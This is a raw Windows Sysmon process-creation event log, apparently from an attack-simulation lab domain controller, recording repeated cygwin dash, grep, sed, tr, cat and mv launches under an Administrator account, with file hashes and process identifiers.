14:55:57.380{A8622C2F-53FD-6078-480A-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.372{A8622C2F-53FD-6078-470A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051965Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.364{A8622C2F-53FD-6078-460A-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.356{A8622C2F-53FD-6078-450A-00000000AE01}4476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.349{A8622C2F-53FD-6078-440A-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.341{A8622C2F-53FD-6078-430A-00000000AE01}1392C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.333{A8622C2F-53FD-6078-420A-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.325{A8622C2F-53FD-6078-410A-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.317{A8622C2F-53FD-6078-400A-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.309{A8622C2F-53FD-6078-3F0A-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.301{A8622C2F-53FD-6078-3E0A-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.292{A8622C2F-53FD-6078-3D0A-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.284{A8622C2F-53FD-6078-3C0A-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051833Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.276{A8622C2F-53FD-6078-3B0A-00000000AE01}2484C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051821Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.267{A8622C2F-53FD-6078-3A0A-00000000AE01}2084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.259{A8622C2F-53FD-6078-390A-00000000AE01}6332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.251{A8622C2F-53FD-6078-380A-00000000AE01}2664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.243{A8622C2F-53FD-6078-370A-00000000AE01}3420C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.235{A8622C2F-53FD-6078-360A-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051761Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.227{A8622C2F-53FD-6078-350A-00000000AE01}5344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051749Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.218{A8622C2F-53FD-6078-340A-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.210{A8622C2F-53FD-6078-330A-00000000AE01}5312C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.202{A8622C2F-53FD-6078-320A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051713Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.188{A8622C2F-53FD-6078-310A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.181{A8622C2F-53FD-6078-300A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.173{A8622C2F-53FD-6078-2F0A-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.164{A8622C2F-53FD-6078-2E0A-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.157{A8622C2F-53FD-6078-2D0A-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051653Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.149{A8622C2F-53FD-6078-2C0A-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.141{A8622C2F-53FD-6078-2B0A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051629Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.133{A8622C2F-53FD-6078-2A0A-00000000AE01}7016C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-290A-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.126{A8622C2F-53FD-6078-290A-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051607Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.115{A8622C2F-53FD-6078-280A-00000000AE01}6748C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FD-6078-260A-00000000AE01}2484C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.107{A8622C2F-53FD-6078-270A-00000000AE01}5516C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-250A-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.107{A8622C2F-53FD-6078-260A-00000000AE01}2484C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051577Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.099{A8622C2F-53FD-6078-250A-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.092{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051553Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.084{A8622C2F-53FD-6078-230A-00000000AE01}3420C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-220A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.077{A8622C2F-53FD-6078-220A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.064{A8622C2F-53FD-6078-210A-00000000AE01}6440C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FD-6078-200A-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051521Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.057{A8622C2F-53FD-6078-200A-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.049{A8622C2F-53FD-6078-1F0A-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FD-6078-1D0A-00000000AE01}1140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 